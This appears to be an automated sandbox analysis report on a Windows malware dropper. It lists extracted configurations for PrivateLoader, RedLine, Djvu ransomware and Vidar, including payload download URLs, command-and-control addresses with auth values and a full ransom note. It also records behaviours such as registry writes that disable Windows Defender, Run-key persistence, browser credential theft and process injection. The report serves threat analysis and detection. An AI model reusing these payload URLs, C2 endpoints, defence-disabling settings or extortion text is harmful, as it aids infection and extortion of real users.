Analysis
-
max time kernel
103s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
01-10-2022 09:41
Static task
static1
Behavioral task
behavioral1
Sample
5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe
Resource
win10v2004-20220901-en
General
-
Target
5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe
-
Size
9.7MB
-
MD5
cb4cda24e0a7761e0d7ac6a84db9d36b
-
SHA1
3245997a0e59f9eed96700a2002c25ba3ccd8cc1
-
SHA256
5a5158c712e1588c621124b5dc4b0c3ebfc064ffc0e2c2623d152e369eb8b8a5
-
SHA512
c900e8f67c9d6846cd0dde8ab1e9faab016d48f5a38c0be63a901672ff06aefd70bf1d1b3d1dcdc48e89f81d85afa9639cae8417e11436727a3afcfaf20f811d
-
SSDEEP
196608:xuLUCgzWCBIaS6WMyN+17+NxJVOBNwlJkM0ljjnu+:xWdgzW8IaOMyE7+NxJsBNnljD
Malware Config
Extracted
privateloader
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
-
payload_url
https://cdn.discordapp.com/attachments/1003879548242374749/1003976870611669043/NiceProcessX64.bmp
https://cdn.discordapp.com/attachments/1003879548242374749/1003976754358124554/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp
Extracted
socelars
http://www.gianninidesign.com/
Extracted
metasploit
windows/single_exec
Extracted
redline
user2121
135.181.129.119:4805
-
auth_value
4ff99ae4e06e0b0c48dfd7df112d9404
Extracted
redline
media18plus
91.121.67.60:51630
-
auth_value
c96c9d4a5663bae22d3eb579546d378f
Extracted
redline
nam6.5
103.89.90.61:34589
-
auth_value
ea8cbb51ed8a91dcbe95697e8bb9a9d7
Extracted
djvu
http://winnlinne.com/test3/get.php
-
extension
.ofoq
-
offline_id
xkNzhkB1wvgoDI7Uo0HPNLY3qCuwoFpP7nlhlut1
-
payload_url
http://rgyui.top/dl/build2.exe
http://winnlinne.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-EWKSsSJiVn Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0568Jhyjd
Extracted
redline
1
79.110.62.196:35726
-
auth_value
4b711fa6f9a5187b40500266349c0baf
Extracted
vidar
54.7
517
https://t.me/trampapanam
https://nerdculture.de/@yoxhyp
-
profile_id
517
Signatures
-
Detect Fabookie payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2146da156ae.exe family_fabookie C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed2146da156ae.exe family_fabookie -
Detected Djvu ransomware 5 IoCs
Processes:
resource yara_rule behavioral2/memory/8032-350-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/8032-353-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/8032-349-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/8096-407-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/8096-408-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Detects Smokeloader packer 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1212-263-0x0000000000590000-0x0000000000599000-memory.dmp family_smokeloader -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Processes:
Wed214b8335df03a0f.execmd.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Wed214b8335df03a0f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Wed214b8335df03a0f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Wed214b8335df03a0f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Wed214b8335df03a0f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Wed214b8335df03a0f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Wed214b8335df03a0f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Wed214b8335df03a0f.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" cmd.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8036 4412 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1152-267-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1152-265-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/4420-283-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4420-281-0x0000000000000000-mapping.dmp family_redline behavioral2/memory/3188-348-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral2/memory/10192-398-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed218c3c4f53dbe01.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS07147A86\Wed218c3c4f53dbe01.exe family_socelars -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
svchost.exedescription pid process target process PID 4432 created 3140 4432 svchost.exe Wed2181d5a4917c14c3.exe PID 4432 created 1732 4432 svchost.exe csrss.exe PID 4432 created 1732 4432 svchost.exe csrss.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS07147A86\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS07147A86\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS07147A86\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS07147A86\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS07147A86\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS07147A86\libcurl.dll aspack_v212_v242 -
Blocklisted process makes network request 64 IoCs
Processes:
cmd.exeflow pid process 214 8468 cmd.exe 215 8468 cmd.exe 216 8468 cmd.exe 217 8468 cmd.exe 218 8468 cmd.exe 219 8468 cmd.exe 220 8468 cmd.exe 221 8468 cmd.exe 223 8468 cmd.exe 225 8468 cmd.exe 226 8468 cmd.exe 227 8468 cmd.exe 228 8468 cmd.exe 229 8468 cmd.exe 230 8468 cmd.exe 231 8468 cmd.exe 232 8468 cmd.exe 234 8468 cmd.exe 235 8468 cmd.exe 236 8468 cmd.exe 237 8468 cmd.exe 238 8468 cmd.exe 239 8468 cmd.exe 240 8468 cmd.exe 241 8468 cmd.exe 242 8468 cmd.exe 243 8468 cmd.exe 244 8468 cmd.exe 247 8468 cmd.exe 249 8468 cmd.exe 250 8468 cmd.exe 251 8468 cmd.exe 252 8468 cmd.exe 253 8468 cmd.exe 254 8468 cmd.exe 255 8468 cmd.exe 256 8468 cmd.exe 257 8468 cmd.exe 258 8468 cmd.exe 259 8468 cmd.exe 260 8468 cmd.exe 261 8468 cmd.exe 262 8468 cmd.exe 263 8468 cmd.exe 264 8468 cmd.exe 265 8468 cmd.exe 266 8468 cmd.exe 268 8468 cmd.exe 269 8468 cmd.exe 270 8468 cmd.exe 271 8468 cmd.exe 272 8468 cmd.exe 273 8468 cmd.exe 275 8468 cmd.exe 276 8468 cmd.exe 277 8468 cmd.exe 278 8468 cmd.exe 279 8468 cmd.exe 280 8468 cmd.exe 281 8468 cmd.exe 282 8468 cmd.exe 284 8468 cmd.exe 285 8468 cmd.exe 286 8468 cmd.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
setup_install.exeWed2181d5a4917c14c3.exeWed214b8335df03a0f.exeWed21ea78c748a30684.exeWed214f6ccf7c811f9d.exeWed21f7d3c36e7eaeca0.exeWed214fc5ff02b7.exeWed2146da156ae.exeWed21c787120ecdf176.exeWed214f6ccf7c811f9d.tmpWed218c3c4f53dbe01.exeWed21852ed61e6a343.exeWed21e08690b2d5.exeWed2135bd1920.exeWed21d25f5841.exeWed214f6ccf7c811f9d.exeWed21852ed61e6a343.tmpWed21d24a91bba8252.exeWed214f6ccf7c811f9d.tmpWed21c787120ecdf176.exeWed21f7d3c36e7eaeca0.exeC9mbNTQ5v~O0SE.exeWed21d24a91bba8252.exeWed2181d5a4917c14c3.execsrss.exeinjector.exes0E2ywOLPU4tRzP1Aeab6Hmc.exe6C9E1BGEBW1wZRwgHbmbPXoY.exeXYAT0f2mxbcq323DID_U7lFu.exeY6g_9ghG2LvGxIQtlbpjnUyZ.exedXyl1h2kEhXgWB8VOfhl1BpG.exem76D27Rc3RtyxWBYhsjGBluV.exeUoebYjish2W0eboo9MSvTsGU.exetllLHrgWRG_VlUzq1KDc4rKs.exenbM6uULZc4xl1P2c9Ubr3_tU.exeCQNw9xZ0E089eWPXNdTQEPf4.exeuDDcuNpQTvTCz2c7PHxhjlvt.exeInstall.exe6C9E1BGEBW1wZRwgHbmbPXoY.exeInstall.exeY6g_9ghG2LvGxIQtlbpjnUyZ.exeSETUP_~1.EXEcmd.exeFVIN5GEmuT3vBSesV3KN4pMp.execuD83qs50VUQxJty0Y9xkG8Q.exerbSA3tUGFBdO0kRFgS_e15dr.exeqy5OACrqpThAbRcUslLBS_2g.exeft04DOugAN_yRClQPKogVWyi.exedgMH12V7VsD9dOAiKI30eTdv.exe9x8OVfskAh1tzPMjFGbDngp_.exeeCZd8qB60HChZ6SA7X0pv44g.exeaDP1V_OXS7NxUGwVfjDy2qub.exelIYgJh5oH3Gd4X2XvUv7TRQa.exehubSc3jms7czq0qQMKpyvN61.exejoDqge54Tv9NCgW49aAyCCam.exesjKDfCT2kSQ4YhWPHKOoLmSB.exeCmw8lbMU1vbPEa32R4CNf5At.exewdEfSoLBh8dn_Si5mhnq4bhj.exe8dIv2siJec0bP7GeQg7IlcK8.exejoDqge54Tv9NCgW49aAyCCam.tmpInstall.exeInstall.exepowershell.exeY6g_9ghG2LvGxIQtlbpjnUyZ.exepid process 4456 setup_install.exe 3140 Wed2181d5a4917c14c3.exe 3468 Wed214b8335df03a0f.exe 880 Wed21ea78c748a30684.exe 4872 Wed214f6ccf7c811f9d.exe 4460 Wed21f7d3c36e7eaeca0.exe 4280 Wed214fc5ff02b7.exe 3664 Wed2146da156ae.exe 396 Wed21c787120ecdf176.exe 3108 Wed214f6ccf7c811f9d.tmp 4572 Wed218c3c4f53dbe01.exe 2876 Wed21852ed61e6a343.exe 4608 Wed21e08690b2d5.exe 1212 Wed2135bd1920.exe 2472 Wed21d25f5841.exe 2172 Wed214f6ccf7c811f9d.exe 4768 Wed21852ed61e6a343.tmp 1296 Wed21d24a91bba8252.exe 4708 Wed214f6ccf7c811f9d.tmp 2544 Wed21c787120ecdf176.exe 1152 Wed21f7d3c36e7eaeca0.exe 4884 C9mbNTQ5v~O0SE.exe 4420 Wed21d24a91bba8252.exe 380 Wed2181d5a4917c14c3.exe 1732 csrss.exe 1216 injector.exe 4608 s0E2ywOLPU4tRzP1Aeab6Hmc.exe 824 6C9E1BGEBW1wZRwgHbmbPXoY.exe 4448 XYAT0f2mxbcq323DID_U7lFu.exe 4936 Y6g_9ghG2LvGxIQtlbpjnUyZ.exe 2564 dXyl1h2kEhXgWB8VOfhl1BpG.exe 5012 m76D27Rc3RtyxWBYhsjGBluV.exe 684 UoebYjish2W0eboo9MSvTsGU.exe 1840 tllLHrgWRG_VlUzq1KDc4rKs.exe 412 nbM6uULZc4xl1P2c9Ubr3_tU.exe 4680 CQNw9xZ0E089eWPXNdTQEPf4.exe 2548 uDDcuNpQTvTCz2c7PHxhjlvt.exe 3272 Install.exe 3188 6C9E1BGEBW1wZRwgHbmbPXoY.exe 7992 Install.exe 8032 Y6g_9ghG2LvGxIQtlbpjnUyZ.exe 8200 SETUP_~1.EXE 8468 cmd.exe 8140 FVIN5GEmuT3vBSesV3KN4pMp.exe 8904 cuD83qs50VUQxJty0Y9xkG8Q.exe 8928 rbSA3tUGFBdO0kRFgS_e15dr.exe 8972 qy5OACrqpThAbRcUslLBS_2g.exe 8504 ft04DOugAN_yRClQPKogVWyi.exe 4564 dgMH12V7VsD9dOAiKI30eTdv.exe 3380 9x8OVfskAh1tzPMjFGbDngp_.exe 1144 eCZd8qB60HChZ6SA7X0pv44g.exe 1704 aDP1V_OXS7NxUGwVfjDy2qub.exe 4304 lIYgJh5oH3Gd4X2XvUv7TRQa.exe 8676 hubSc3jms7czq0qQMKpyvN61.exe 3540 joDqge54Tv9NCgW49aAyCCam.exe 8564 sjKDfCT2kSQ4YhWPHKOoLmSB.exe 9088 Cmw8lbMU1vbPEa32R4CNf5At.exe 8744 wdEfSoLBh8dn_Si5mhnq4bhj.exe 9256 8dIv2siJec0bP7GeQg7IlcK8.exe 9600 joDqge54Tv9NCgW49aAyCCam.tmp 9836 Install.exe 9408 Install.exe 9008 powershell.exe 9664 Y6g_9ghG2LvGxIQtlbpjnUyZ.exe -
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Processes:
resource yara_rule behavioral2/memory/1840-343-0x0000000140000000-0x000000014060E000-memory.dmp vmprotect behavioral2/memory/8564-375-0x0000000140000000-0x000000014060E000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 18 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
9x8OVfskAh1tzPMjFGbDngp_.exehubSc3jms7czq0qQMKpyvN61.exeWed21c787120ecdf176.exemshta.exemshta.exeWed214b8335df03a0f.execmd.exeSETUP_~1.EXEWed21e08690b2d5.exemshta.exeUoebYjish2W0eboo9MSvTsGU.exejoDqge54Tv9NCgW49aAyCCam.tmpY6g_9ghG2LvGxIQtlbpjnUyZ.exeInstall.exe5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exeC9mbNTQ5v~O0SE.exeCQNw9xZ0E089eWPXNdTQEPf4.exeInstall.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 9x8OVfskAh1tzPMjFGbDngp_.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation hubSc3jms7czq0qQMKpyvN61.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Wed21c787120ecdf176.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Wed214b8335df03a0f.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation SETUP_~1.EXE Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Wed21e08690b2d5.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation UoebYjish2W0eboo9MSvTsGU.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation joDqge54Tv9NCgW49aAyCCam.tmp Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Y6g_9ghG2LvGxIQtlbpjnUyZ.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 5A5158C712E1588C621124B5DC4B0C3EBFC064FFC0E2C.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C9mbNTQ5v~O0SE.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation CQNw9xZ0E089eWPXNdTQEPf4.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Install.exe -
Loads dropped DLL 14 IoCs
Processes:
setup_install.exeWed214f6ccf7c811f9d.tmpmsiexec.exerundll32.exejoDqge54Tv9NCgW49aAyCCam.tmprundll32.exerundll32.exerundll32.exepid process 4456 setup_install.exe 4456 setup_install.exe 4456 setup_install.exe 4456 setup_install.exe 4456 setup_install.exe 4456 setup_install.exe 3108 4708 Wed214f6ccf7c811f9d.tmp 4696 msiexec.exe 8024 rundll32.exe 9600 joDqge54Tv9NCgW49aAyCCam.tmp 9944 rundll32.exe 9796 rundll32.exe 796 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
Wed2181d5a4917c14c3.exenbM6uULZc4xl1P2c9Ubr3_tU.exeY6g_9ghG2LvGxIQtlbpjnUyZ.exeFVIN5GEmuT3vBSesV3KN4pMp.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QuietVoice = "\"C:\\Windows\\rss\\csrss.exe\"" Wed2181d5a4917c14c3.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce nbM6uULZc4xl1P2c9Ubr3_tU.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" nbM6uULZc4xl1P2c9Ubr3_tU.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\065ffed1-a0e1-4fb9-aa1e-5a6569453ab9\\Y6g_9ghG2LvGxIQtlbpjnUyZ.exe\" --AutoStart" Y6g_9ghG2LvGxIQtlbpjnUyZ.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce FVIN5GEmuT3vBSesV3KN4pMp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" FVIN5GEmuT3vBSesV3KN4pMp.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 217 ipinfo.io 19 ip-api.com 109 ipinfo.io 110 ipinfo.io 200 ipinfo.io 201 ipinfo.io 202 api.2ip.ua 203 api.2ip.ua 313 api.2ip.ua -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
Wed21f7d3c36e7eaeca0.exeWed21d24a91bba8252.exe6C9E1BGEBW1wZRwgHbmbPXoY.exewdEfSoLBh8dn_Si5mhnq4bhj.exeY6g_9ghG2LvGxIQtlbpjnUyZ.exedescription pid process target process PID 4460 set thread context of 1152 4460 Wed21f7d3c36e7eaeca0.exe Wed21f7d3c36e7eaeca0.exe PID 1296 set thread context of 4420 1296 Wed21d24a91bba8252.exe Wed21d24a91bba8252.exe PID 824 set thread context of 3188 824 6C9E1BGEBW1wZRwgHbmbPXoY.exe 6C9E1BGEBW1wZRwgHbmbPXoY.exe PID 4936 set thread context of 8032 4936 Y6g_9ghG2LvGxIQtlbpjnUyZ.exe PID 8744 set thread context of 10192 8744 wdEfSoLBh8dn_Si5mhnq4bhj.exe wdEfSoLBh8dn_Si5mhnq4bhj.exe PID 9664 set thread context of 8096 9664 Y6g_9ghG2LvGxIQtlbpjnUyZ.exe Y6g_9ghG2LvGxIQtlbpjnUyZ.exe -
Drops file in Program Files directory 2 IoCs
Processes:
CQNw9xZ0E089eWPXNdTQEPf4.exedescription ioc process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe CQNw9xZ0E089eWPXNdTQEPf4.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe CQNw9xZ0E089eWPXNdTQEPf4.exe -
Drops file in Windows directory 2 IoCs
Processes:
Wed2181d5a4917c14c3.exedescription ioc process File opened for modification C:\Windows\rss Wed2181d5a4917c14c3.exe File created C:\Windows\rss\csrss.exe Wed2181d5a4917c14c3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 21 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2236 1840 WerFault.exe tllLHrgWRG_VlUzq1KDc4rKs.exe 8136 2548 WerFault.exe uDDcuNpQTvTCz2c7PHxhjlvt.exe 8732 2548 WerFault.exe uDDcuNpQTvTCz2c7PHxhjlvt.exe 9052 2548 WerFault.exe uDDcuNpQTvTCz2c7PHxhjlvt.exe 2132 2548 WerFault.exe uDDcuNpQTvTCz2c7PHxhjlvt.exe 9156 2548 WerFault.exe uDDcuNpQTvTCz2c7PHxhjlvt.exe 9764 2548 WerFault.exe uDDcuNpQTvTCz2c7PHxhjlvt.exe 10052 8564 WerFault.exe sjKDfCT2kSQ4YhWPHKOoLmSB.exe 8868 1144 WerFault.exe eCZd8qB60HChZ6SA7X0pv44g.exe 8752 2548 WerFault.exe uDDcuNpQTvTCz2c7PHxhjlvt.exe 9056 4304 WerFault.exe lIYgJh5oH3Gd4X2XvUv7TRQa.exe 10156 1144 WerFault.exe eCZd8qB60HChZ6SA7X0pv44g.exe 9456 1144 WerFault.exe eCZd8qB60HChZ6SA7X0pv44g.exe 9028 796 WerFault.exe rundll32.exe 10272 2548 WerFault.exe uDDcuNpQTvTCz2c7PHxhjlvt.exe 10264 1144 WerFault.exe eCZd8qB60HChZ6SA7X0pv44g.exe 10660 1144 WerFault.exe eCZd8qB60HChZ6SA7X0pv44g.exe 11096 1144 WerFault.exe eCZd8qB60HChZ6SA7X0pv44g.exe 10316 1144 WerFault.exe eCZd8qB60HChZ6SA7X0pv44g.exe 10196 1144 WerFault.exe eCZd8qB60HChZ6SA7X0pv44g.exe 31568 2548 WerFault.exe uDDcuNpQTvTCz2c7PHxhjlvt.exe -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Wed2135bd1920.exem76D27Rc3RtyxWBYhsjGBluV.exeft04DOugAN_yRClQPKogVWyi.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed2135bd1920.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI m76D27Rc3RtyxWBYhsjGBluV.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ft04DOugAN_yRClQPKogVWyi.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ft04DOugAN_yRClQPKogVWyi.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed2135bd1920.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Wed2135bd1920.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI m76D27Rc3RtyxWBYhsjGBluV.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI m76D27Rc3RtyxWBYhsjGBluV.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ft04DOugAN_yRClQPKogVWyi.exe -
